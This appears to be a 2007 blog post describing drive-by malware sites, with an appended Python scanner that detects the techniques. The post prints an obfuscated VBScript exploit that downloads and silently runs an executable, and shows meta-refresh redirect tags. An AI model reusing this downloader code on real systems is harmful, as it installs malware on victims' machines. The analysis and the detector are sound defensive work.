Saturday, May 05, 2007

Malware sites

I was poking around the net and found some interesting malware sites:

Please don't try any of them unless you know what you are doing
< meta http-equiv="Refresh" content="0; URL=">
< meta http-equiv="Refresh" content="0; URL=">
"" Leia atentamente todas as exigencias.

And another type, which uses VBScript:
on error resume next
Dim haotian
Set y = Nothing
Set data = document.createElement(ppp2,"")
data.setAttribute ("classid"), ("clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
bbs ="Micro"
bbs0 ="delm"
bbs1 ="soft.XMLHTTP"
bbs2 =bbs&bbs1
result = Null And Null
Set x = data.CreateObject(bbs2,"")
set mm = data.createobject("Adodb.Stream","")
mm.type = 1
url = ""
x.Open ysha, url, False
bbp1 ="Scrip"
bbp2 ="ting.FileSystem"
bbp3 ="Object"
bbp =bbp1&bbp2&bbp3
mm.write x.responseBody
set F = data.createobject(bbp,"")
Set T = Nothing
set tmp = F.GetSpecialFolder(2)
exe= F.BuildPath(tmp,exe)
mm.savetofile exe,2
set Bb = data.createobject("Shell.Application","")
Bb.ShellExecute exe,"","","open",0

A little more Googling led me to this
which holds tons of malware sites; most of them use the above two techniques, by embedding them inside a script or Flash, or by simply posting the link.

Certainly most of this malware is coded in different ways and has various features, such as keylogging, reverse connect, spawning a port, sending credentials over email or to IRC, etc. I'm not surprised that they use script to force the victim to download their babies, but using < meta http-equiv="Refresh" content="0; URL=http://url"> is indeed pretty cool, because it will be executed even if you disable JavaScript in the browser. I guess that if it is possible to change the exe to some other common MIME type that a browser will download automatically, such as gif, swf, etc., it will make the whole game more serious and horrible.

However, it is so funny to see how they work, and it is easy to steal what the attackers had collected, because most of the cracked stuff is stored in plain text.
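
A static check for the two delivery techniques shown in this post, as an added example that is not part of the original post: it flags a meta refresh that points at an executable, plus the VBScript markers (the classid and the ProgIDs, including ones split across string concatenations such as bbs&bbs1). The function names, the extension list and the sample page with its host.invalid address are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

RDS_CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"  # classid in the post (RDS.DataSpace)
PROGIDS = ("microsoft.xmlhttp", "adodb.stream",
           "scripting.filesystemobject", "shell.application")
RISKY_EXT = (".exe", ".scr", ".pif")  # assumption: extensions worth flagging
META = re.compile(r"<meta\b[^>]*http-equiv\s*=\s*[\"']?refresh[\"']?[^>]*>", re.I)
TARGET = re.compile(r"content\s*=\s*[\"']\s*\d+\s*[;,]\s*url\s*=\s*([^\"'\s>]+)", re.I)

def resolve_concat(script):
    """Fold `x = "lit"` and `x = a & b` assignments into the strings they build."""
    env = {}
    for name, rhs in re.findall(r'(?m)^[ \t]*(\w+)[ \t]*=[ \t]*(.+?)[ \t]*$', script):
        vals = []
        for part in (p.strip() for p in rhs.split("&")):
            if re.fullmatch(r'"[^"]*"', part):
                vals.append(part[1:-1])
            elif part.lower() in env:
                vals.append(env[part.lower()])
            else:
                break  # not a pure string expression; skip it
        else:
            env[name.lower()] = "".join(vals)
    return env

def scan(page):
    """Return (rule, evidence) findings for one page of HTML/VBScript text."""
    low, findings = page.lower(), []
    for tag in META.findall(page):
        m = TARGET.search(tag)
        if m and urlparse(m.group(1)).path.lower().endswith(RISKY_EXT):
            findings.append(("meta-refresh-exe", m.group(1)))
    if RDS_CLSID in low:
        findings.append(("rds-dataspace-classid", RDS_CLSID))
    findings += [("literal-progid", p) for p in PROGIDS if p in low]
    findings += [("split-progid", v) for v in resolve_concat(page).values()
                 if v.lower() in PROGIDS and v.lower() not in low]
    return findings

# Constructed sample mirroring the two techniques; the host is a placeholder.
SAMPLE = '''<meta http-equiv="Refresh" content="0; URL=http://host.invalid/a.exe">
<script language="VBScript">
data.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
bbs ="Micro"
bbs1 ="soft.XMLHTTP"
bbs2 =bbs&bbs1
set mm = data.createobject("Adodb.Stream","")
</script>'''
```

The split-progid rule only fires when the ProgID never appears whole in the page, which is the case the plain substring match misses.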
